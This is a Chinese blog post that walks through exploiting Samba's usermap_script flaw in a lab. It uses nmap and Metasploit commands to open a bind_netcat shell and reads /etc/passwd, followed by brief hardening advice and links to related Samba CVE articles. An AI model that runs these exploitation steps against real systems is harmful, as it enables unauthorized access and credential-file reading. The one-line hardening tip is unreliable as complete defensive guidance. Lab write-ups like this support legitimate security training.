Samba漏洞详解

最新推荐文章于 2024-04-02 13:37:07 发布
最新推荐文章于 2024-04-02 13:37:07 发布
阅读量395 收藏 1
点赞数 1
分类专栏: 漏洞详解 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64593235/article/details/130250982
版权

  • 准备工作

  • nmap扫描

  • Samba漏洞利用

  • 漏洞加固

准备工作

准备一台开启445端口的靶机和一台渗透机方便测试

nmap扫描

nmap -sV -p445 172.16.1.32 -T5

通过扫描发现445端口开启

漏洞利用

use multi/samba/usermap_script

模块利用

set payload cmd/unix/bind_netcat

设置载荷模块

set rhost 172.16.1.32

设置靶机ip

set lhost 172.16.1.94

设置攻击机ip(即kali机ip)

cat /etc/passwd

发现成功回弹用户信息,渗透成功

漏洞加固

可以通过开启防火墙,进行防护,本文用的445端口,加固的话,禁用445端口就好了。

注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……

北冥曙光
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
RHEL5下samba配置
09-03
讲述RedHat Enterprise Linux 5下samba的配置
安装samba服务器步骤.docx
02-06
主要介绍在linux和windows server中搭建samba服务
Samba再报安全漏洞
weixin_34032621的博客
02-25 183
       今日Samba再报重大漏洞,该漏洞目前编号为CVE-2015-0240,Samba守护进程smbd里一个为初始化的指针可被远程漏洞利用,她可以让恶意的Samba客户端发送一个特定的netlogon数据包从而获得smbd运行的权限,并且smbd的默认权限还是root超级管理员,该漏洞影响Samba 3.5以及更高的版本,目前多数的GNU/Linux发行版都会受到影响,Red Hat S...
Samba漏洞
weixin_33701617的博客
05-25 158
Samba 团队发布安全通告(https://www.samba.org/samba/security/CVE-2017-7494.html) ,并提供了补丁(https://arstechnica.com/security/2017/05/a-wormable-code-execution-bug-has-lurked-in-samba-for-7-years-patch-now/)。一个一直存...
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2378
samba漏洞
Linux系统中修复SambaCry漏洞(CVE-2017-7494)
weixin_34372728的博客
08-08 1355
Samba 很久以来一直是为 *nix 系统上的 Windows 客户端提供共享文件和打印服务的标准。家庭用户,中型企业和大型公司都在使用它,它作为最佳解决方案在多种操作系统共存的环境中脱颖而出。 由于广泛使用的工具很可能发生这种情况,大多数 Samba 安装都面临着可能利用已知漏洞的攻击的风险,这个漏洞直到 WannaCry 勒索软件攻击的新闻出来之...
centos7.5 Samba-4.10.16安全漏洞修复
linux小菜鸡的博客
10-26 1019
​ 先使用ps命令查看到smbd进程id,然后使用kill杀掉进程。漏洞原因是因为smb启用了较低版本的协议。操作系统:centos 7.5。Samba版本:4.10.16。保存退出后重启Samba
SARA 漏洞评估工具
01-02
**SARA漏洞评估工具详解** SARA,全称为"Security Auditing and Reporting Application",是一款功能强大的网络安全评估工具,它的设计灵感来源于早期的SATAN(Security Administrator Toolkit for Analyzing ...
各个端口详解
06-17
### 各个端口详解 #### 0号端口(Reserved) - **含义**:0号端口通常被操作系统保留,用于内部系统服务。 - **使用情况**:一般不建议应用程序使用0号端口,因为它可能被操作系统用来为某些系统服务提供一个特殊的...
文件共享之samba服务器(cifs)
01-09
同时,定期更新Samba软件以防止已知的安全漏洞至关重要。 **7. 配置Samba与Windows域集成** 如果要在Linux环境中实现Windows域的集成,Samba需要配置为Domain Controller或成员服务器。这涉及到复杂的设置,包括DNS...
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2203
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker
渗透测试——利用Samba服务的SambaCry获取shell
weixin_43520214的博客
03-22 4169
渗透测试——利用Samba服务的SambaCry获取shell
linux smb 漏洞_LinuxSamba远程代码执行漏洞防护说明
weixin_35662417的博客
12-23 758
原标题:LinuxSamba远程代码执行漏洞防护说明背景2017年5月24日Samba官网发布了软件升级补丁修复了远程代码执行漏洞CVE-2017-7494,在安全圈引起关注。目前针对该漏洞的POC和EXP已经在网络流传,对网络上使用存在漏洞版本软件的服务器造成巨大危害。攻击者如果成功利用该漏洞可以远程在服务端执行任意代码,拥有Samba可写权限的攻击者可利用此漏洞获取目标系统的root权限。受影...
复现Samba sysmlink默认配置目录遍历漏洞
最新发布
NatusVincere
04-02 448
打开kali,输入msfconsole,进入msf控制台。提示输入密码,直接按下回车即可,这样就是使用匿名模式登录。第0个即为需要使用的漏洞,输入 use 0进行利用。输入show options 查看需要设置的参数。使用smbclient命令连接靶机的tmp文件夹。将下面两行粘贴到配置文件中[global]下面。打开metaspoitable2查看靶机IP。/smb.conf的global设置下添加。新建一个控制台窗口,输入命令修改配置文件。所以需要先在配置文件/etc/输入ls即可查看文件。
linux samba漏洞,Linux版Samba漏洞防御更新补丁
weixin_35639451的博客
05-17 591
新的一轮风暴就要来临了,一个 Linux 版的“永恒之蓝”又出现了!电脑一不小心就会中上病毒,该漏洞编号为 CVE-2017-7494,仅仅只用一行代码就能利用该漏洞执行恶意代码。还没有更新的朋友赶紧来下载Samba漏洞防御辅助软件。具体攻击过程介绍:1. 构造一个有’/’ 符号的管道名或路径名,如 “/home/toor/cyg07.so”2. 通过smb的协议主动让服务器smb返回该FID3....
jackson 序列化_Fasterxml | Jackson 多个反序列化漏洞
weixin_39604819的博客
12-02 573
0x00 漏洞概述编 号issue:2798、issue:2814、issue:2826、issue:2827时 间2020-08-27类 型等 级高危远程利用是影响范围jackson-databind < 2.9.10.6Fasterxml主要用于Java 平台的数据分析。jackson-databind是FasterXML项目下的JSON库。Fasterx...
利用samba漏洞入侵linux主机(samba低版本漏洞利用)
weixin_62870602的博客
08-11 3147
复现samba漏洞入侵linux主机
基于445端口漏洞的入侵测试
qq_50905066的博客
03-19 5585
实验环境 靶机:一台Windows server 2003(IP:192.168.80.200)服务器 攻击者:一台Windows xp主机(IP:192.168.80.205)和一台kali主机(IP:192.168.80.206) 实验原理 (1)445端口的smb服务提供了主机远程访问的服务器的潜在威胁 (2)Windows下共享文件服务开启时,存在隐藏共享文件 (3)Windows server 2003自带telnet功能,存在安全隐患 实验步骤 信息收集 在Windows xp上运行端
解决samba文件共享服务因445端口被禁不能访问问题
热门推荐
小肥柚的笔记
09-26 1万+
依靠samba服务挂载的远程文件夹忽然不能访问了,怀疑是端口被禁, 查看samba服务使用的端口: sudo netstat -tlnp |grep smb 显示当前使用的是默认的139和455(win10通过ip访问时是默认走455) Samba服务所使用的端口和协议: 1)Port 137 (UDP) - NetBIOS 名字服务 ; nmbd 2)Port 138 (UDP) - NetBIOS 数据报服务 3)Port 139 (TCP) - 文件和打印共享 ; smbd (基于SMB(Ser
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值